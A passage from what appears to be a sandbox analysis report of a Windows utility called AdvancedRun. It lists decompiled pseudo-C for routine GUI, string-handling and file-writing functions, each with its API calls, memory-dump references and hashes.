				return _t30;
			}




















                                                                  0x0040ad06
                                                                  0x0040ad0a
                                                                  0x0040ad0c
                                                                  0x0040ad14
                                                                  0x0040ad19
                                                                  0x0040ad1f
                                                                  0x0040ad23
                                                                  0x0040ad27
                                                                  0x0040ad2a
                                                                  0x0040ad2d
                                                                  0x0040ad34
                                                                  0x0040ad3b
                                                                  0x0040ad3e
                                                                  0x0040ad44
                                                                  0x0040ad48
                                                                  0x0040ad4a
                                                                  0x0040ad52
                                                                  0x0040ad5a
                                                                  0x0040ad64
                                                                  0x0040ad65
                                                                  0x0040ad6b
                                                                  0x0040ad6c
                                                                  0x0040ad73
                                                                  0x0040ad76
                                                                  0x0040ad7c
                                                                  0x0040ad7c
                                                                  0x0040ad7f
                                                                  0x0040ad84

                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                  • String ID:
                                                                  • API String ID: 3917621476-0
                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                  0x00404a62
                                                                  0x00404a6a
                                                                  0x00404a6e
                                                                  0x00404a71
                                                                  0x00404a74
                                                                  0x00404a92
                                                                  0x00404a92
                                                                  0x00404a76
                                                                  0x00404a76
                                                                  0x00404a87
                                                                  0x00404a90
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404a90
                                                                  0x00404aa3
                                                                  0x00404aa7
                                                                  0x00404aa7
                                                                  0x00404a94
                                                                  0x00404a98

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item
                                                                  • String ID:
                                                                  • API String ID: 3888421826-0
                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                  0x004072e0
                                                                  0x004072f7
                                                                  0x004072fd
                                                                  0x00407316
                                                                  0x00407342

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004072FD
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                  • strlen.MSVCRT ref: 00407328
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                  • String ID:
                                                                  • API String ID: 2754987064-0
                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                  0x00408dd0
                                                                  0x00408dd2
                                                                  0x00408de2
                                                                  0x00408df4
                                                                  0x00408e01
                                                                  0x00408e1b
                                                                  0x00408e21
                                                                  0x00408e28
                                                                  0x00408e30
                                                                  0x00408dd4
                                                                  0x00408dd8
                                                                  0x00408dd8

                                                                  APIs
                                                                  • memcpy.MSVCRT ref: 00408DE2
                                                                  • memcpy.MSVCRT ref: 00408DF4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00008ADB,00000000), ref: 00408E1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                  • String ID:
                                                                  • API String ID: 1386444988-0
                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                  0x004050e1
                                                                  0x004050ec
                                                                  0x004050ee
                                                                  0x004050f5
                                                                  0x004050ff
                                                                  0x00405114
                                                                  0x00405118
                                                                  0x00405123
                                                                  0x00405128
                                                                  0x00405101
                                                                  0x00405109
                                                                  0x0040510f
                                                                  0x0040512e

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcsncat
                                                                  • String ID:
                                                                  • API String ID: 291873006-0
                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                  0x00402de0
                                                                  0x00402de2
                                                                  0x00402dec
                                                                  0x00402def
                                                                  0x00402dfb
                                                                  0x00402e0c
                                                                  0x00402e0e
                                                                  0x00402e0e
                                                                  0x00402e16
                                                                  0x00402e18
                                                                  0x00402e1a
                                                                  0x00402e21

                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientPoints
                                                                  • String ID:
                                                                  • API String ID: 4235085887-0
                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                  0x0040b6a6
                                                                  0x0040b6ad
                                                                  0x0040b6af
                                                                  0x0040b6b0
                                                                  0x0040b6b5
                                                                  0x0040b6b6
                                                                  0x0040b6bd
                                                                  0x0040b6bf
                                                                  0x0040b6c0
                                                                  0x0040b6c5
                                                                  0x0040b6c6
                                                                  0x0040b6cd
                                                                  0x0040b6cf
                                                                  0x0040b6d0
                                                                  0x0040b6d5
                                                                  0x0040b6d6
                                                                  0x0040b6dd
                                                                  0x0040b6df
                                                                  0x0040b6e0
                                                                  0x00000000
                                                                  0x0040b6e5
                                                                  0x0040b6e6

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                  0x00407362
                                                                  0x00407369
                                                                  0x0040736e
                                                                  0x00407371
                                                                  0x00407378
                                                                  0x0040737e
                                                                  0x00407381
                                                                  0x00407386
                                                                  0x0040739f
                                                                  0x00407388
                                                                  0x00407391
                                                                  0x00407391
                                                                  0x004073a4
                                                                  0x004073ac
                                                                  0x004073ad
                                                                  0x004073cd
                                                                  0x004073d0
                                                                  0x004073d3
                                                                  0x004073d6
                                                                  0x004073e0
                                                                  0x004073e7
                                                                  0x004073ee
                                                                  0x004073f5
                                                                  0x0040741a
                                                                  0x0040741a
                                                                  0x0040741d
                                                                  0x00407420
                                                                  0x00407423
                                                                  0x00407426
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004073fc
                                                                  0x00407400
                                                                  0x0040740f
                                                                  0x00407412
                                                                  0x00407412
                                                                  0x00407402
                                                                  0x00407402
                                                                  0x00407407
                                                                  0x00407407
                                                                  0x00407413
                                                                  0x00407419
                                                                  0x00407419
                                                                  0x00407419
                                                                  0x0040742f
                                                                  0x00407434
                                                                  0x00407437
                                                                  0x00407439
                                                                  0x0040743b
                                                                  0x0040743b
                                                                  0x0040744e
                                                                  0x00407453
                                                                  0x00407453
                                                                  0x004073af
                                                                  0x004073b2
                                                                  0x004073ba
                                                                  0x004073bb
                                                                  0x00000000
                                                                  0x004073bd
                                                                  0x004073c3
                                                                  0x004073c3
                                                                  0x004073bb
                                                                  0x0040745c
                                                                  0x00407468
                                                                  0x00407468
                                                                  0x0040746d
                                                                  0x00407473
                                                                  0x0040747c
                                                                  0x0040748e

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcschr$memcpywcslen
                                                                  • String ID: "
                                                                  • API String ID: 1983396471-123907689
                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 45%
                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                  0x00401676
                                                                  0x0040167e
                                                                  0x0040168a
                                                                  0x0040168c
                                                                  0x00401690
                                                                  0x00401691
                                                                  0x00401696
                                                                  0x0040169d
                                                                  0x004016a2
                                                                  0x004016aa
                                                                  0x004016aa
                                                                  0x004016aa
                                                                  0x004016ad
                                                                  0x004016ae
                                                                  0x004016b3
                                                                  0x004016b9
                                                                  0x004016bb
                                                                  0x004016bc
                                                                  0x004016c1
                                                                  0x004016c8
                                                                  0x004016cd
                                                                  0x004016ce
                                                                  0x004016ea
                                                                  0x004016ff
                                                                  0x0040170c
                                                                  0x004016d0
                                                                  0x004016e3
                                                                  0x004016e3
                                                                  0x00401711
                                                                  0x00401714
                                                                  0x00000000
                                                                  0x00401719
                                                                  0x0040171c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: Line%d$Lines
                                                                  • API String ID: 3988819677-2790224864
                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                  0x00405132
                                                                  0x00405135
                                                                  0x00405139
                                                                  0x0040513e
                                                                  0x00405141
                                                                  0x004051b3
                                                                  0x00405143
                                                                  0x00405145
                                                                  0x00405147
                                                                  0x0040514c
                                                                  0x0040514e
                                                                  0x00405151
                                                                  0x00405151
                                                                  0x0040515b
                                                                  0x0040515c
                                                                  0x0040515d
                                                                  0x0040515e
                                                                  0x0040515f
                                                                  0x00405168
                                                                  0x00405169
                                                                  0x00405171
                                                                  0x00405173
                                                                  0x00405174
                                                                  0x00405182
                                                                  0x00405184
                                                                  0x00405189
                                                                  0x0040518c
                                                                  0x00405194
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405196
                                                                  0x0040519a
                                                                  0x0040519b
                                                                  0x004051a1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004051a1
                                                                  0x004051a3
                                                                  0x004051a3
                                                                  0x004051a6
                                                                  0x004051af
                                                                  0x004051b0
